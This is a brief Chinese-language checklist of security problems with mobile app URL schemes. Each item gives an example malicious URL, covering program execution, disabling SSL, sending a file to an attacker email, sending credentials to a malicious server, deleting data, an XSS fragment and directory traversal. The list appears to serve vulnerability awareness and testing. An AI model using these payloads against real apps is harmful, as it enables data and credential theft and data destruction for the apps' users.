URL Scheme可能存在的问题
- 调起内部敏感组件或数据
myapp://cmd/run?program=/path/to/program/to/run - 直接更改内部配置
myapp://cmd/set_preference?use_ssl=false - 泄露内部敏感文件
myapp://cmd/sendfile?to=evil@attacker.com&file=some/data/file - 删除某些敏感文件
myapp://cmd/delete?data_to_delete=my_document_ive_been_working_on - 泄露凭据信息
myapp://cmd/login_to?server_to_send_credentials=malicious.webserver.com - 未过滤数据导致的xss
myapp://cmd/adduser=’>”> - 目录穿越
myapp://use_template?template=/../../../../../../../../some/other/file
- 调起内部敏感组件或数据